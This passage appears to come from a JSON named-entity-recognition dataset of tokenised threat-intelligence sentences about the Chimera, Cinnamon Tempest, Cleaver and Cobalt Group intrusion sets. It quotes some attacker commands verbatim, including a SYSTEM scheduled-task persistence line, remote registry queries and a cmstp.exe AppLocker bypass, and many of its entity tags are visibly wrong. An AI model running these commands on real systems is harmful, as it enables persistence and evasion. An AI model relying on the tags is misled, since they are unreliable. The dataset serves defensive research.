"O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "dumped", + "password", + "hashes", + "for", + "use", + "in", + "pass", + "the", + "hash", + "authentication", + "attacks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "I-OffAct", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "used", + "the", + "NtdsAudit", + "utility", + "to", + "collect", + "information", + "related", + "to", + "accounts", + "and", + "passwords." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "used", + "multiple", + "password", + "spraying", + "attacks", + "against", + "victim's", + "remote", + "services", + "to", + "obtain", + "valid", + "user", + "and", + "administrator", + "accounts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-OffAct", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "used", + "PowerShell", + "scripts", + "to", + "execute", + "malicious", + "payloads", + "and", + "the", + "DSInternals", + "PowerShell", + "module", + "to", + "make", + "use", + "of", + "Active", + "Directory", + "features." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "used", + "<code>tasklist</code>", + "to", + "enumerate", + "processes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "encapsulated", + "Cobalt", + "Strike's", + "C2", + "protocol", + "in", + "DNS", + "and", + "HTTPS." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "queried", + "Registry", + "keys", + "using", + "<code>reg", + "query", + "\\\\<host>\\HKU\\<SID>\\SOFTWARE\\Microsoft\\Terminal", + "Server", + "Client\\Servers</code>", + "and", + "<code>reg", + "query", + "\\\\<host>\\HKU\\<SID>\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet", + "Settings</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "staged", + "stolen", + "data", + "on", + "designated", + "servers", + "in", + "the", + "target", + "environment." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "used", + "RDP", + "to", + "access", + "targeted", + "systems." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "harvested", + "data", + "from", + "remote", + "mailboxes", + "including", + "through", + "execution", + "of", + "<code>\\\\<hostname>\\c$\\Users\\<username>\\AppData\\Local\\Microsoft\\Outlook*.ost</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "utilized", + "various", + "scans", + "and", + "queries", + "to", + "find", + "domain", + "controllers", + "and", + "remote", + "services", + "in", + "the", + "target", + "environment." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "used", + "Windows", + "admin", + "shares", + "to", + "move", + "laterally." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "used", + "scheduled", + "tasks", + "to", + "invoke", + "Cobalt", + "Strike", + "including", + "through", + "batch", + "script", + "<code>schtasks", + "/create", + "/ru", + "\"SYSTEM\"", + "/tn", + "\"update\"", + "/tr", + "\"cmd", + "/c", + "c:\\windows\\temp\\update.bat\"", + "/sc", + "once", + "/f", + "/st</code>", + "and", + "to", + "maintain", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "B-Tool", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "used", + "PsExec", + "to", + "deploy", + "beacons", + "on", + "compromised", + "systems." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "collected", + "documents", + "from", + "the", + "victim's", + "SharePoint." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "used", + "`fsutil", + "fsinfo", + "drives`,", + "`systeminfo`,", + "and", + "`vssadmin", + "list", + "shadows`", + "for", + "system", + "information", + "including", + "shadow", + "volumes", + "and", + "drive", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "used", + "ipconfig,", + "Ping,", + "and", + "<code>tracert</code>", + "to", + "enumerate", + "the", + "IP", + "address", + "and", + "network", + "environment", + "and", + "settings", + "of", + "the", + "local", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "used", + "<code>netstat", + "-ano", + "|", + "findstr", + "EST</code>", + "to", + "discover", + "network", + "connections." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "used", + "the", + "<code>quser</code>", + "command", + "to", + "show", + "currently", + "logged", + "on", + "users." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "used", + "<code>net", + "start</code>", + "and", + "<code>net", + "use</code>", + "for", + "system", + "service", + "discovery." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "used", + "<code>time", + "/t</code>", + "and", + "<code>net", + "time", + "\\\\ip/hostname</code>", + "for", + "system", + "time", + "discovery." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "used", + "a", + "Windows", + "version", + "of", + "the", + "Linux", + "<code>touch</code>", + "command", + "to", + "modify", + "the", + "date", + "and", + "time", + "stamp", + "on", + "DLLs." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "obtained", + "and", + "used", + "tools", + "such", + "as", + "BloodHound,", + "Cobalt", + "Strike,", + "Mimikatz,", + "and", + "PsExec." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Tool", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "used", + "a", + "valid", + "account", + "to", + "maintain", + "persistence", + "via", + "scheduled", + "task." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "used", + "HTTPS", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "used", + "the", + "Windows", + "Command", + "Shell", + "and", + "batch", + "scripts", + "for", + "execution", + "on", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "used", + "WMIC", + "to", + "execute", + "remote", + "commands." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "used", + "WinRM", + "for", + "lateral", + "movement." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cinnamon", + "Tempest", + "has", + "used", + "search", + "order", + "hijacking", + "to", + "launch", + "Cobalt", + "Strike", + "Beacons." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cinnamon", + "Tempest", + "has", + "abused", + "legitimate", + "executables", + "to", + "side-load", + "weaponized", + "DLLs." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Cinnamon", + "Tempest", + "has", + "used", + "weaponized", + "DLLs", + "to", + "load", + "and", + "decrypt", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cinnamon", + "Tempest", + "has", + "obtained", + "highly", + "privileged", + "credentials", + "such", + "as", + "domain", + "administrator", + "in", + "order", + "to", + "deploy", + "malware." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-OffAct", + "B-OffAct" + ] + }, + { + "tokens": [ + "Cinnamon", + "Tempest", + "has", + "uploaded", + "captured", + "keystroke", + "logs", + "to", + "the", + "Alibaba", + "Cloud", + "Object", + "Storage", + "Service,", + "Aliyun", + "OSS." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cinnamon", + "Tempest", + "has", + "exploited", + "multiple", + "unpatched", + "vulnerabilities", + "for", + "initial", + "access", + "including", + "vulnerabilities", + "in", + "Microsoft", + "Exchange,", + "Manage", + "Engine", + "AdSelfService", + "Plus,", + "Confluence,", + "and", + "Log4j." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cinnamon", + "Tempest", + "has", + "maintained", + "leak", + "sites", + "for", + "exfiltrated", + "data", + "in", + "attempt", + "to", + "extort", + "victims", + "into", + "paying", + "a", + "ransom." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cinnamon", + "Tempest", + "has", + "used", + "Group", + "Policy", + "to", + "deploy", + "batch", + "scripts", + "for", + "ransomware", + "deployment." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "O" + ] + }, + { + "tokens": [ + "Cinnamon", + "Tempest", + "has", + "downloaded", + "files,", + "including", + "Cobalt", + "Strike,", + "to", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cinnamon", + "Tempest", + "has", + "used", + "PowerShell", + "to", + "communicate", + "with", + "C2,", + "download", + "files,", + "and", + "execute", + "reconnaissance", + "commands." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cinnamon", + "Tempest", + "has", + "used", + "the", + "Iox", + "and", + "NPS", + "proxy", + "and", + "tunneling", + "tools", + "in", + "combination", + "create", + "multiple", + "connections", + "through", + "a", + "single", + "tunnel." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "B-Tool", + "O", + "B-Tool", + "B-Tool", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cinnamon", + "Tempest", + "has", + "used", + "a", + "customized", + "version", + "of", + "the", + "Iox", + "port-forwarding", + "and", + "proxy", + "tool." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cinnamon", + "Tempest", + "has", + "used", + "a", + "customized", + "version", + "of", + "the", + "Impacket", + "wmiexec.py", + "module", + "to", + "create", + "renamed", + "output", + "files." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cinnamon", + "Tempest", + "has", + "used", + "SMBexec", + "for", + "lateral", + "movement." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cinnamon", + "Tempest", + "has", + "deployed", + "ransomware", + "from", + "a", + "batch", + "file", + "in", + "a", + "network", + "share." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cinnamon", + "Tempest", + "has", + "used", + "open-source", + "tools", + "including", + "customized", + "versions", + "of", + "the", + "Iox", + "proxy", + "tool,", + "NPS", + "tunneling", + "tool,", + "Meterpreter,", + "and", + "a", + "keylogger", + "that", + "uploads", + "data", + "to", + "Alibaba", + "cloud", + "storage." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "I-Tool", + "B-Way", + "I-Tool", + "O", + "B-Way", + "I-Tool", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cinnamon", + "Tempest", + "has", + "used", + "compromised", + "user", + "accounts", + "to", + "deploy", + "payloads", + "and", + "create", + "system", + "services." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Cinnamon", + "Tempest", + "has", + "executed", + "ransomware", + "using", + "batch", + "scripts", + "deployed", + "via", + "GPO." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "Cinnamon", + "Tempest", + "has", + "used", + "Impacket", + "for", + "lateral", + "movement", + "via", + "WMI." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Cinnamon", + "Tempest", + "has", + "created", + "system", + "services", + "to", + "establish", + "persistence", + "for", + "deployed", + "tooling." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cleaver", + "has", + "used", + "custom", + "tools", + "to", + "facilitate", + "ARP", + "cache", + "poisoning." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "B-Way", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Cleaver", + "has", + "been", + "known", + "to", + "dump", + "credentials", + "using", + "Mimikatz", + "and", + "Windows", + "Credential", + "Editor." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Tool", + "B-SecTeam", + "B-Tool" + ] + }, + { + "tokens": [ + "Cleaver", + "has", + "created", + "customized", + "tools", + "and", + "payloads", + "for", + "functions", + "including", + "ARP", + "poisoning,", + "encryption,", + "credential", + "dumping,", + "ASP.NET", + "shells,", + "web", + "backdoors,", + "process", + "enumeration,", + "WMI", + "querying,", + "HTTP", + "and", + "SMB", + "communications,", + "network", + "interface", + "sniffing,", + "and", + "keystroke", + "logging." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Features", + "B-Features", + "B-Way", + "B-HackOrg", + "B-Way", + "B-Tool", + "B-Tool", + "B-Tool", + "I-Features", + "B-HackOrg", + "B-Way", + "B-HackOrg", + "B-Way", + "O", + "B-Tool", + "O", + "I-Features", + "I-Features", + "O", + "O", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "Cleaver", + "has", + "created", + "fake", + "LinkedIn", + "profiles", + "that", + "included", + "profile", + "photos,", + "details,", + "and", + "connections." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cleaver", + "has", + "obtained", + "and", + "used", + "open-source", + "tools", + "such", + "as", + "PsExec,", + "Windows", + "Credential", + "Editor,", + "and", + "Mimikatz." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Cobalt", + "Group", + "has", + "used", + "the", + "Plink", + "utility", + "to", + "create", + "SSH", + "tunnels." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Group", + "has", + "bypassed", + "UAC." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Group", + "has", + "used", + "the", + "command", + "<code>cmstp.exe", + "/s", + "/ns", + "C:\\Users\\ADMINI~W\\AppData\\Local\\Temp\\XKNqbpzl.txt</code>", + "to", + "bypass", + "AppLocker", + "and", + "launch", + "a", + "malicious", + "script." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Group", + "obfuscated", + "several", + "scriptlets", + "and", + "code", + "used", + "on", + "the", + "victim’s", + "machine,", + "including", + "through", + "use", + "of", + "XOR", + "and", + "RC4." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Group", + "has", + "compromised", + "legitimate", + "web", + "browser", + "updates", + "to", + "deliver", + "a", + "backdoor." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Group", + "has", + "used", + "DNS", + "tunneling", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Group", + "has", + "sent", + "malicious", + "Word", + "OLE", + "compound", + "documents", + "to", + "victims." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "B-SamFile", + "B-Way", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Group", + "had", + "exploited", + "multiple", + "vulnerabilities", + "for", + "execution,", + "including", + "Microsoft’s", + "Equation", + "Editor", + "(CVE-2017-11882),", + "an", + "Internet", + "Explorer", + "vulnerability", + "(CVE-2018-8174),", + "CVE-2017-8570,", + "CVE-2017-0199,", + "and", + "CVE-2017-8759." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "B-Features", + "B-Features", + "B-Features", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "Cobalt", + "Group", + "has", + "used", + "exploits", + "to", + "increase", + "their", + "levels", + "of", + "rights", + "and", + "privileges." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Group", + "deleted", + "the", + "DLL", + "dropper", + "from", + "the", + "victim’s", + "machine", + "to", + "cover", + "their", + "tracks." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Group", + "has", + "used", + "public", + "sites", + "such", + "as", + "github.com", + "and", + "sendspace.com", + "to", + "upload", + "files", + "and", + "then", + "download", + "them", + "to", + "victim", + "computers.", + "The", + "group's", + "JavaScript", + "backdoor", + "is", + "also", + "capable", + "of", + "downloading", + "files." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Group", + "has", + "executed", + "JavaScript", + "scriptlets", + "on", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Group", + "has", + "added", + "persistence", + "by", + "registering", + "the", + "file", + "name", + "for", + "the", + "next", + "stage", + "malware", + "under", + "<code>HKCU\\Environment\\UserInitMprLogonScript</code>." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Group", + "has", + "sent", + "emails", + "containing", + "malicious", + "attachments", + "that", + "require", + "users", + "to", + "execute", + "a", + "file", + "or", + "macro", + "to", + "infect", + "the", + "victim", + "machine." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Group", + "has", + "sent", + "emails", + "containing", + "malicious", + "links", + "that", + "require", + "users", + "to", + "execute", + "a", + "file", + "or", + "macro", + "to", + "infect", + "the", + "victim", + "machine." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Group", + "leveraged", + "an", + "open-source", + "tool", + "called", + "SoftPerfect", + "Network", + "Scanner", + "to", + "perform", + "network", + "scanning." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Group", + "has", + "used", + "<code>odbcconf</code>", + "to", + "proxy", + "the", + "execution", + "of", + "malicious", + "DLL", + "files." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Group", + "has", + "used", + "powershell.exe", + "to", + "download", + "and", + "execute", + "scripts." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Group", + "has", + "injected", + "code", + "into", + "trusted", + "processes." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Group", + "has", + "used", + "the", + "Plink", + "utility", + "to", + "create", + "SSH", + "tunnels." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Group", + "has", + "used", + "Registry", + "Run", + "keys", + "for", + "persistence.", + "The", + "group", + "has", + "also", + "set", + "a", + "Startup", + "path", + "to", + "launch", + "the", + "PowerShell", + "shell", + "command", + "and", + "download", + "Cobalt", + "Strike." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Cobalt", + "Group", + "has", + "used", + "regsvr32.exe", + "to", + "execute", + "scripts." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Group", + "used", + "the", + "Ammyy", + "Admin", + "tool", + "as", + "well", + "as", + "TeamViewer", + "for", + "remote", + "access,", + "including", + "to", + "preserve", + "remote", + "access", + "if", + "a", + "Cobalt", + "Strike", + "module", + "was", + "lost." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "B-Way", + "O", + "I-OffAct", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Group", + "has", + "used", + "Remote", + "Desktop", + "Protocol", + "to", + "conduct", + "lateral", + "movement." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Group", + "has", + "created", + "Windows", + "tasks", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Group", + "used", + "a", + "JavaScript", + "backdoor", + "that", + "is", + "capable", + "of", + "collecting", + "a", + "list", + "of", + "the", + "security", + "solutions", + "installed", + "on", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Group", + "has", + "sent", + "spearphishing", + "emails", + "with", + "various", + "attachment", + "types", + "to", + "corporate", + "and", + "personal", + "email", + "accounts", + "of", + "victim", + "organizations.", + "Attachment", + "types", + "have", + "included", + ".rtf,", + ".doc,", + ".xls,", + "archives", + "containing", + "LNK", + "files,", + "and", + "password", + "protected", + "archives", + "containing", + ".exe", + "and", + ".scr", + "executables." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + 